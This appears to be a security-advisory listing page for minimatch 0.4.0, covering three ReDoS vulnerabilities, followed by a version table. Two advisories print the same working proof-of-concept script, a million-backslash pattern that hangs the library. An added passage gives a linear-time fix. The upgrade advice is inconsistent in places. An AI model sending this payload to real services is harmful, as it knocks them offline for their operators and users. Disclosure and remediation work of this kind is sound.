NodeJS/minimatch/0.4.0


a glob matcher in javascript

https://www.npmjs.com/package/minimatch
MIT

3 Security Vulnerabilities

minimatch ReDoS vulnerability

Published date: 2022-10-18T12:00:32Z
CVE: CVE-2022-3517

A vulnerability was found in the minimatch package. This flaw allows a Regular Expression Denial of Service (ReDoS) when calling the braceExpand function with specific arguments, resulting in a Denial of Service.

Affected versions: ["0.0.1", "0.0.2", "0.0.4", "0.0.5", "0.1.1", "0.1.2", "0.1.3", "0.1.4", "0.1.5", "0.2.0", "0.2.2", "0.2.3", "0.2.4", "0.2.5", "0.2.6", "0.2.7", "0.2.8", "0.2.9", "0.2.10", "0.2.11", "0.2.12", "0.2.13", "0.2.14", "0.3.0", "0.4.0", "1.0.0", "2.0.0", "2.0.1", "2.0.2", "2.0.3", "2.0.4", "2.0.5", "2.0.6", "2.0.7", "2.0.8", "2.0.9", "2.0.10", "3.0.0", "3.0.2", "3.0.3", "3.0.4"]
Secure versions: [3.0.5, 3.0.6, 4.0.0, 4.1.0, 3.1.0, 3.1.1, 3.0.7, 4.1.1, 4.2.0, 4.2.1, 5.0.0, 3.1.2, 3.0.8, 5.0.1, 5.1.0, 5.1.1, 5.1.2, 5.1.3, 5.1.4, 6.0.0, 6.0.1, 6.0.2, 6.0.3, 6.0.4, 6.1.0, 6.1.1, 6.1.2, 5.1.5, 4.2.2, 6.1.3, 6.1.4, 5.1.6, 4.2.3, 6.1.5, 6.1.6, 6.1.7, 6.1.8, 6.1.9, 6.1.10, 6.2.0, 7.0.0, 7.0.1, 7.1.0, 7.1.1, 7.1.2, 7.1.3, 7.1.4, 7.2.0, 7.3.0, 7.4.0, 7.4.1, 7.4.2, 7.4.3, 7.4.4, 8.0.0, 8.0.1, 8.0.2, 7.4.5, 8.0.3, 8.0.4, 7.4.6, 9.0.0, 9.0.1, 9.0.2, 9.0.3, 9.0.4]
Recommendation: Update to version 9.0.4.

Regular Expression Denial of Service in minimatch

Published date: 2018-10-09T00:40:41Z
CVE: CVE-2016-10540

Affected versions of minimatch are vulnerable to regular expression denial of service attacks when user input is passed into the pattern argument of minimatch(path, pattern).

Proof of Concept

```
var minimatch = require("minimatch");

// utility function for generating long strings
var genstr = function (len, chr) {
  var result = "";
  for (var i = 0; i <= len; i++) {
    result = result + chr;
  }
  return result;
}

// "[!" followed by one million backslashes and a trailing "A"
var exploit = "[!" + genstr(1000000, "\\") + "A";

// minimatch exploit.
console.log("starting minimatch");
minimatch("foo", exploit);
console.log("finishing minimatch");
```

Recommendation

Update to version 3.0.2 or later.

Affected versions: ["0.0.1", "0.0.2", "0.0.4", "0.0.5", "0.1.1", "0.1.2", "0.1.3", "0.1.4", "0.1.5", "0.2.0", "0.2.2", "0.2.3", "0.2.4", "0.2.5", "0.2.6", "0.2.7", "0.2.8", "0.2.9", "0.2.10", "0.2.11", "0.2.12", "0.2.13", "0.2.14", "0.3.0", "0.4.0", "1.0.0", "2.0.0", "2.0.1", "2.0.2", "2.0.3", "2.0.4", "2.0.5", "2.0.6", "2.0.7", "2.0.8", "2.0.9", "2.0.10", "3.0.0"]
Secure versions: [3.0.5, 3.0.6, 4.0.0, 4.1.0, 3.1.0, 3.1.1, 3.0.7, 4.1.1, 4.2.0, 4.2.1, 5.0.0, 3.1.2, 3.0.8, 5.0.1, 5.1.0, 5.1.1, 5.1.2, 5.1.3, 5.1.4, 6.0.0, 6.0.1, 6.0.2, 6.0.3, 6.0.4, 6.1.0, 6.1.1, 6.1.2, 5.1.5, 4.2.2, 6.1.3, 6.1.4, 5.1.6, 4.2.3, 6.1.5, 6.1.6, 6.1.7, 6.1.8, 6.1.9, 6.1.10, 6.2.0, 7.0.0, 7.0.1, 7.1.0, 7.1.1, 7.1.2, 7.1.3, 7.1.4, 7.2.0, 7.3.0, 7.4.0, 7.4.1, 7.4.2, 7.4.3, 7.4.4, 8.0.0, 8.0.1, 8.0.2, 7.4.5, 8.0.3, 8.0.4, 7.4.6, 9.0.0, 9.0.1, 9.0.2, 9.0.3, 9.0.4]
Recommendation: Update to version 9.0.4.

Regular Expression Denial of Service

Published date: 2016-06-20
CVSS Score: 7.5
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Coordinating vendor: ^Lift Security

Minimatch is a minimal matching utility that works by converting glob expressions into JavaScript RegExp objects. The primary function, minimatch(path, pattern), is vulnerable to ReDoS via the pattern parameter because of the regular expression on line 521 of minimatch.js: /((?:\\{2})*)(\\?)\|/g. The problematic portion of the regex is ((?:\\{2})*), which matches an unbounded run of backslashes (\\).

A proof of concept is as follows:

```
var minimatch = require("minimatch");

// utility function for generating long strings
var genstr = function (len, chr) {
  var result = "";
  for (var i = 0; i <= len; i++) {
    result = result + chr;
  }
  return result;
}

// "[!" followed by one million backslashes and a trailing "A"
var exploit = "[!" + genstr(1000000, "\\") + "A";

// minimatch exploit.
console.log("starting minimatch");
minimatch("foo", exploit);
console.log("finishing minimatch");
```
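The nested quantifier in that regex is what backtracks: for a long run of backslashes that is not followed by |, the engine retries every way of splitting the run before giving up. As an added example (not code from the minimatch project or from the advisory), the block below does the job the regex is used for, deciding whether each | is escaped by an odd number of preceding backslashes, in a single linear pass, with the advisory's regex kept alongside for comparison on short inputs; the function names are my own.

```javascript
// The advisory's regex: an even run of backslashes, an optional single
// backslash, then a pipe. On a long backslash run that is NOT followed by
// '|', every start position retries every split of the run: quadratic work.
const VULNERABLE_PIPE_RE = /((?:\\{2})*)(\\?)\|/g;

// Classify every '|' with the regex: it is escaped iff group 2 captured a
// backslash, i.e. an odd number of backslashes precedes the pipe.
function classifyPipesWithRegex(pattern) {
  const pipes = [];
  for (const m of pattern.matchAll(VULNERABLE_PIPE_RE)) {
    pipes.push({ index: m.index + m[0].length - 1, escaped: m[2] === '\\' });
  }
  return pipes;
}

// Same classification in one left-to-right pass. A counter of consecutive
// backslashes replaces the nested quantifier, so the cost is O(n) for every
// input, including the advisory's million-backslash pattern.
function classifyPipesLinear(pattern) {
  const pipes = [];
  let run = 0; // backslashes immediately preceding the current character
  for (let i = 0; i < pattern.length; i++) {
    const ch = pattern[i];
    if (ch === '\\') {
      run++;
      continue;
    }
    if (ch === '|') pipes.push({ index: i, escaped: run % 2 === 1 });
    run = 0;
  }
  return pipes;
}

// The input from the advisory's proof of concept: "[!", one million
// backslashes, then "A" (constructed here, nothing is read from disk).
function advisoryPattern(count = 1000000) {
  return '[!' + '\\'.repeat(count) + 'A';
}

// Run only the linear scanner on that input and report how long it took.
function demo() {
  const start = Date.now();
  const pipes = classifyPipesLinear(advisoryPattern());
  return { pipesFound: pipes.length, elapsedMs: Date.now() - start };
}

console.log(demo());
```

Feeding advisoryPattern() to classifyPipesWithRegex on an unpatched engine reproduces the hang the advisory describes, which is why demo() deliberately calls only the linear version.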

Affected versions: ["0.0.1", "0.0.2", "0.0.4", "0.0.5", "0.1.1", "0.1.2", "0.1.3", "0.1.4", "0.1.5", "0.2.0", "0.2.2", "0.2.3", "0.2.4", "0.2.5", "0.2.6", "0.2.7", "0.2.8", "0.2.9", "0.2.10", "0.2.11", "0.2.12", "0.2.13", "0.2.14", "0.3.0", "0.4.0", "1.0.0", "2.0.0", "2.0.1", "2.0.2", "2.0.3", "2.0.4", "2.0.5", "2.0.6", "2.0.7", "2.0.8", "2.0.9", "2.0.10", "3.0.0"]
Secure versions: [3.0.5, 3.0.6, 4.0.0, 4.1.0, 3.1.0, 3.1.1, 3.0.7, 4.1.1, 4.2.0, 4.2.1, 5.0.0, 3.1.2, 3.0.8, 5.0.1, 5.1.0, 5.1.1, 5.1.2, 5.1.3, 5.1.4, 6.0.0, 6.0.1, 6.0.2, 6.0.3, 6.0.4, 6.1.0, 6.1.1, 6.1.2, 5.1.5, 4.2.2, 6.1.3, 6.1.4, 5.1.6, 4.2.3, 6.1.5, 6.1.6, 6.1.7, 6.1.8, 6.1.9, 6.1.10, 6.2.0, 7.0.0, 7.0.1, 7.1.0, 7.1.1, 7.1.2, 7.1.3, 7.1.4, 7.2.0, 7.3.0, 7.4.0, 7.4.1, 7.4.2, 7.4.3, 7.4.4, 8.0.0, 8.0.1, 8.0.2, 7.4.5, 8.0.3, 8.0.4, 7.4.6, 9.0.0, 9.0.1, 9.0.2, 9.0.3, 9.0.4]
Recommendation: Update to version 3.0.2 or greater.

107 Other Versions

Version License Security(advisories; blank = none) Released(date - time) Age
9.0.4 ISC 2024-03-28 - 19:42 28 days
9.0.3 ISC 2023-07-06 - 17:05 10 months
9.0.2 ISC 2023-06-23 - 21:12 10 months
9.0.1 ISC 2023-05-20 - 20:53 11 months
9.0.0 ISC 2023-04-09 - 22:15 about 1 year
8.0.4 ISC 2023-04-09 - 20:17 about 1 year
8.0.3 ISC 2023-04-03 - 16:51 about 1 year
8.0.2 ISC 2023-04-02 - 03:41 about 1 year
8.0.1 ISC 2023-04-02 - 03:39 about 1 year
8.0.0 ISC 2023-04-02 - 03:33 about 1 year
7.4.6 ISC 2023-04-09 - 20:18 about 1 year
7.4.5 ISC 2023-04-03 - 16:49 about 1 year
7.4.4 ISC 2023-04-01 - 23:44 about 1 year
7.4.3 ISC 2023-03-22 - 18:52 about 1 year
7.4.2 ISC 2023-03-01 - 20:13 about 1 year
7.4.1 ISC 2023-03-01 - 07:59 about 1 year
7.4.0 ISC 2023-03-01 - 06:59 about 1 year
7.3.0 ISC 2023-02-27 - 19:58 about 1 year
7.2.0 ISC 2023-02-26 - 09:13 about 1 year
7.1.4 ISC 2023-02-26 - 01:03 about 1 year
7.1.3 ISC 2023-02-25 - 02:07 about 1 year
7.1.2 ISC 2023-02-24 - 22:56 about 1 year
7.1.1 ISC 2023-02-24 - 00:36 about 1 year
7.1.0 ISC 2023-02-22 - 23:45 about 1 year
7.0.1 ISC 2023-02-22 - 02:01 about 1 year
7.0.0 ISC 2023-02-20 - 00:45 about 1 year
6.2.0 ISC 2023-02-13 - 08:58 about 1 year
6.1.10 ISC 2023-02-13 - 08:20 about 1 year
6.1.9 ISC 2023-02-13 - 06:54 about 1 year
6.1.8 ISC 2023-02-11 - 21:10 about 1 year
6.1.7 ISC 2023-02-11 - 20:33 about 1 year
6.1.6 ISC 2023-01-22 - 17:52 over 1 year
6.1.5 ISC 2023-01-17 - 22:17 over 1 year
6.1.4 ISC 2023-01-17 - 17:46 over 1 year
6.1.3 ISC 2023-01-17 - 17:24 over 1 year
6.1.2 ISC 2023-01-17 - 15:02 over 1 year
6.1.1 ISC 2023-01-17 - 14:57 over 1 year
6.1.0 ISC 2023-01-17 - 07:11 over 1 year
6.0.4 ISC 2023-01-16 - 01:55 over 1 year
6.0.3 ISC 2023-01-15 - 23:08 over 1 year
6.0.2 ISC 2023-01-15 - 21:26 over 1 year
6.0.1 ISC 2023-01-15 - 17:37 over 1 year
6.0.0 ISC 2023-01-14 - 21:07 over 1 year
5.1.6 ISC 2023-01-17 - 19:46 over 1 year
5.1.5 ISC 2023-01-17 - 15:04 over 1 year
5.1.4 ISC 2023-01-14 - 19:09 over 1 year
5.1.3 ISC 2023-01-14 - 18:54 over 1 year
5.1.2 ISC 2022-12-20 - 15:12 over 1 year
5.1.1 ISC 2022-11-29 - 20:33 over 1 year
5.1.0 ISC 2022-05-16 - 16:13 almost 2 years
5.0.1 ISC 2022-02-24 - 17:58 about 2 years
5.0.0 ISC 2022-02-15 - 16:50 about 2 years
4.2.3 ISC 2023-01-17 - 19:47 over 1 year
4.2.2 ISC 2023-01-17 - 15:09 over 1 year
4.2.1 ISC 2022-02-15 - 16:35 about 2 years
4.2.0 ISC 2022-02-15 - 16:03 about 2 years
4.1.1 ISC 2022-02-13 - 04:22 about 2 years
4.1.0 ISC 2022-02-13 - 00:58 about 2 years
4.0.0 ISC 2022-02-13 - 00:37 about 2 years
3.1.2 ISC 2022-02-15 - 20:32 about 2 years
3.1.1 ISC 2022-02-13 - 04:01 about 2 years
3.1.0 ISC 2022-02-13 - 01:03 about 2 years
3.0.8 ISC 2022-02-15 - 20:33 about 2 years
3.0.7 ISC 2022-02-13 - 04:03 about 2 years
3.0.6 ISC 2022-02-12 - 23:58 about 2 years
3.0.5 ISC 2022-02-06 - 20:28 about 2 years
3.0.4 ISC 1 2017-05-07 - 18:11 almost 7 years
3.0.3 ISC 1 2016-08-08 - 17:45 over 7 years
3.0.2 ISC 1 2016-06-17 - 20:13 almost 8 years
3.0.0 ISC 3 2015-09-27 - 18:18 over 8 years
2.0.10 ISC 3 2015-07-23 - 01:51 almost 9 years
2.0.9 ISC 3 2015-07-18 - 23:03 almost 9 years
2.0.8 ISC 3 2015-05-19 - 01:38 almost 9 years
2.0.7 MIT 3 2015-04-29 - 15:43 almost 9 years
2.0.6 MIT 3 2015-04-29 - 15:25 almost 9 years
2.0.5 MIT 3 2015-04-29 - 14:37 almost 9 years
2.0.4 MIT 3 2015-03-12 - 17:34 about 9 years
2.0.3 MIT 3 2015-03-10 - 02:03 about 9 years
2.0.2 MIT 3 2015-03-10 - 00:34 about 9 years
2.0.1 MIT 3 2014-12-01 - 16:30 over 9 years
2.0.0 MIT 3 2014-12-01 - 02:12 over 9 years
1.0.0 MIT 3 2014-07-28 - 21:29 over 9 years
0.4.0 MIT 3 2014-07-11 - 23:25 almost 10 years
0.3.0 MIT 3 2014-05-13 - 00:47 almost 10 years
0.2.14 MIT 3 2013-12-16 - 22:01 over 10 years
0.2.13 MIT 3 2013-12-16 - 06:02 over 10 years
0.2.12 MIT 3 2013-04-12 - 19:28 about 11 years
0.2.11 MIT 3 2013-02-25 - 16:23 about 11 years
0.2.10 MIT 3 2013-02-25 - 16:21 about 11 years
0.2.9 MIT 3 2012-10-25 - 15:34 over 11 years
0.2.8 MIT 3 2012-10-25 - 15:24 over 11 years
0.2.7 MIT 3 2012-10-04 - 03:49 over 11 years
0.2.6 MIT 3 2012-08-13 - 16:42 over 11 years
0.2.5 MIT 3 2012-06-04 - 20:57 almost 12 years
0.2.4 MIT 3 2012-03-29 - 01:48 about 12 years
0.2.3 MIT 3 2012-03-29 - 01:37 about 12 years
0.2.2 MIT 3 2012-03-22 - 05:22 about 12 years
0.2.0 MIT 3 2012-02-22 - 11:04 about 12 years
0.1.5 MIT 3 2012-02-04 - 19:32 about 12 years
0.1.4 MIT 3 2012-01-19 - 00:14 over 12 years